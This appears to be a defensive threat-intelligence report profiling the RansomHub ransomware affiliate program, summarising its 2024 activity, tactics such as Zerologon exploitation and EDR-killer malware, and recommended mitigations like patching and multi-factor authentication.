Full Report
As we step into 2025, the high-impact, financially motivated ransomware landscape continues to evolve, shaped by a combination of law enforcement actions, shifting affiliate dynamics, advancements in defensive approaches, and broader economic and geopolitical influences.
Analysis Summary
# Threat Actor: RansomHub
## Attribution & Identity
RansomHub is identified as a prominent, financially motivated ransomware affiliate program that emerged in 2024. It capitalized on the disruption caused by law enforcement actions against groups like LockBit and the exit scam by ALPHV/BlackCat. RansomHub has been linked to claims that some ALPHV affiliates migrated to their platform.
## Activity Summary
RansomHub launched its affiliate program in February 2024 and operated uninterrupted throughout the year. It established itself as one of the most notable affiliate programs, claiming one of the highest numbers of victims in 2024. The group actively uses the RAMP forum for communication and recruitment. Its success is attributed to an affiliate-friendly model, offering a favorable 90-10 split and a direct payment structure.
## Tactics, Techniques & Procedures
- **Initial Access:** Phishing emails, password spraying, and exploiting publicly facing infrastructure.
- **Vulnerability Exploitation:** Targeting known vulnerabilities, including **CVE-2020-1472** (Zerologon) and flaws in enterprise solutions (Citrix, Apache, Confluence, Fortinet).
- **Credential Acquisition:** Gaining access via direct compromises or Initial Access Brokers (IABs), often utilizing Malware-as-a-Service (MaaS) offerings.
- **Entry Points:** Exposed Remote Desktop Services (RDS) and systems lacking Multi-Factor Authentication (MFA).
- **Evasion/Defense Evasion:** Use of custom-built **"EDR-killer"** malware designed to neutralize Endpoint Detection and Response solutions.
- **Data Movement & Staging:** Use of tools like `netscan` and `rclone`.
- **Ransomware Development:** Uses Golang-based ransomware.
- **Malware/Extortion:** Employs varied extortion tactics, including encryption and data theft, or focuses strictly on data theft and direct blackmail.
## Targeting
- **Sectors:** Not explicitly detailed, but focused on high-impact targets given the nature of RaaS and the high number of victims claimed.
- **Geography:** Not specified in the provided text.
- **Victims:** Claimed one of the highest numbers of victims throughout 2024.
## Tools & Infrastructure
- **Malware Families:** Golang-based ransomware, custom "EDR-killer" malware.
- **Infrastructure:** Utilized the RAMP forum for communication. Specific C2 or IP addresses were not detailed.
## Implications
RansomHub demonstrated significant operational maturity compared to its 2024 peers. Its ability to thrive following major law enforcement actions and competitor collapse signals its readiness to be a dominant force in the RaaS market entering 2025. Its successful business model and adaptability suggest continued high impact on victim organizations.
## Mitigations
- Prioritize **rigorous patch management**, especially for enterprise solutions like Citrix, Apache, and Fortinet, and known critical vulnerabilities like CVE-2020-1472.
- Implement robust **Multi-Factor Authentication (MFA)** on all exposed systems, particularly Remote Desktop Services.
- Deploy **advanced detection and response solutions** to counter custom defenses like EDR-killers.
- Integrate **threat intelligence** to anticipate attacker behaviors specific to this group.